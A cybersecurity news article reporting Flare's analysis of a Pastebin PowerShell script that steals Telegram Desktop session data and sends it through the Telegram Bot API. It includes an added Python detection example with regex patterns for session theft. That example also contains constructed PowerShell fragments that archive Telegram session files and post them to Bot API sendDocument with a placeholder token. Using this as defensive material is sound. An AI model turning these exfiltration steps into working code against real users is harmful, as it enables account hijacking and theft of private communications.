Hackers Use Pastebin PowerShell Script to Steal Telegram Session Data

Hackers Exploit Pastebin-Hosted PowerShell Script to Hijack Telegram Sessions

Cybersecurity researchers have recently identified a malicious PowerShell script hosted on Pastebin, specifically engineered to clandestinely extract Telegram session data from both desktop and web clients. Masquerading as a routine Windows system update, this script deceives users into executing it, thereby compromising their Telegram accounts without immediate detection.

Deceptive Disguise and Execution

The script is labeled Windows Telemetry Update, a title deliberately chosen to resemble legitimate Windows maintenance tasks. Upon execution, it initiates a sequence of operations designed to gather and exfiltrate sensitive information. Initially, the script collects host metadata, including the victim’s username, computer name, and public IP address obtained via api.ipify[.]org. Subsequently, it targets directories associated with Telegram installations, specifically %APPDATA%\Telegram Desktop and %APPDATA%\Telegram Desktop Beta. Within these directories, the script locates session files and compiles them into a compressed archive named diag.zip, which is temporarily stored in the user’s TEMP folder.

Discovery and Analysis

Flare analysts uncovered this Pastebin-hosted script during routine monitoring of paste sites and illicit channels for malicious content. Their investigation revealed a purpose-built Telegram session stealer that not only targets desktop session data but also exfiltrates it through the Telegram Bot API. Notably, the script shares infrastructure with a separate web-based session capture tool, indicating a coordinated effort to compromise Telegram accounts across different platforms.

The script was found in two versions on Pastebin, both posted under the same account. The initial version (v1) contained a flawed multipart upload implementation, preventing the diag.zip archive from reaching the bot. Recognizing this failure, the operator revised the script and published a corrected version (v2) that properly implements the sendDocument endpoint using Invoke-RestMethod -Form with correct multipart/form-data encoding. This debugging process, visible in the public Pastebin post history, offers a rare insight into the development and testing phases of session-stealing tools before their operational deployment.

Operational Status and Potential Threat

Neither version of the script includes obfuscation, persistence mechanisms, or automated delivery or execution methods. Based on Flare’s analysis, the script appeared to be in active validation at the time of discovery rather than deployed in a live campaign. However, the functional v2 variant and the confirmed web-based session stealer sharing the same bot infrastructure suggest that the capability has passed functional validation and could move toward scaled operation.

Mechanism of Telegram Session Theft

The infection chain begins when a victim manually runs the PowerShell file. From there, Flare's analysis followed two investigative paths in parallel: querying the Telegram Bot API directly to enumerate the bot, and retrieving existing bot telemetry from the bot's message history using the Matka tool.

After collecting host metadata, the script checks for both stable and beta installations of Telegram Desktop under %APPDATA%. If it identifies any matching paths, it proceeds to archive the session files; otherwise, it triggers a "No Telegram installation found" beacon, ensuring the operator is notified of every execution, regardless of the outcome.
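As an added defender-side example (not code from the article or from Flare), the following Python checks a PowerShell script-block log entry for the co-occurring behaviours described above: Telegram Desktop paths, a diag.zip archive, an api.ipify.org lookup and calls to the Telegram Bot API. The regexes, field names and both sample blocks are constructed for illustration.

```python
import re

# Indicators drawn from the behaviour the article describes. The patterns
# themselves are hypothetical detection logic, not taken from the script.
INDICATORS = {
    "telegram_path": re.compile(r"Telegram Desktop( Beta)?", re.I),
    "session_archive": re.compile(r"Compress-Archive|diag\.zip", re.I),
    "public_ip_lookup": re.compile(r"api\.ipify\.org", re.I),
    "bot_api_exfil": re.compile(r"api\.telegram\.org/bot[^/\s]+/(sendDocument|sendMessage)", re.I),
}
# Bot API URL layout: the bot token sits between "/bot" and the method name.
BOT_METHOD = re.compile(r"api\.telegram\.org/bot[^/\s]+/(\w+)", re.I)

def analyse_script_block(text):
    """Score one PowerShell script-block log entry (e.g. Event ID 4104 text).

    Returns the indicator names that matched, a verdict, and the Bot API
    methods called with the token redacted so a report can be shared safely.
    """
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    methods = sorted({f"/bot<redacted>/{m}" for m in BOT_METHOD.findall(text)})
    # The defining combination from the article: touching Telegram Desktop
    # data AND pushing data out through the Bot API. Archiving or a public
    # IP lookup alone is common in legitimate admin scripts and only adds context.
    suspicious = "telegram_path" in hits and "bot_api_exfil" in hits
    return {"hits": hits, "suspicious": suspicious, "bot_methods": methods}

# Constructed, non-functional fragments resembling what such a script block would log.
SUSPECT_BLOCK = r'''
$dirs = "$env:APPDATA\Telegram Desktop", "$env:APPDATA\Telegram Desktop Beta"
$ip = Invoke-RestMethod -Uri "https://api.ipify.org"
Compress-Archive -Path $found -DestinationPath "$env:TEMP\diag.zip"
Invoke-RestMethod -Uri "https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendMessage" ...
Invoke-RestMethod -Uri "https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendDocument" ...
'''

# Constructed benign block: archives logs and checks the public IP, no Telegram at all.
BENIGN_BLOCK = r'''
$ip = Invoke-RestMethod -Uri "https://api.ipify.org"
Compress-Archive -Path "C:\Logs\*.log" -DestinationPath "$env:TEMP\logs.zip"
'''

if __name__ == "__main__":
    for label, block in (("suspect", SUSPECT_BLOCK), ("benign", BENIGN_BLOCK)):
        print(label, analyse_script_block(block))
```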

Implications and Recommendations

This discovery underscores the evolving tactics of cybercriminals who exploit trusted platforms like Pastebin to host and disseminate malicious scripts. By disguising malware as legitimate system updates, attackers increase the likelihood of user execution, thereby facilitating unauthorized access to sensitive information.

To mitigate such threats, users are advised to:

– Exercise Caution with Unsolicited Updates: Be wary of unexpected system update prompts, especially those delivered via email or third-party websites.

– Verify Update Sources: Always download updates directly from official vendor websites or through trusted update mechanisms.

– Implement Robust Security Measures: Utilize comprehensive security solutions that can detect and block malicious scripts and unauthorized data exfiltration attempts.

– Regularly Monitor Account Activity: Keep an eye on account activities for any unauthorized access or anomalies, particularly in communication applications like Telegram.

By adopting these practices, individuals and organizations can enhance their defenses against sophisticated cyber threats that exploit trusted platforms and social engineering tactics.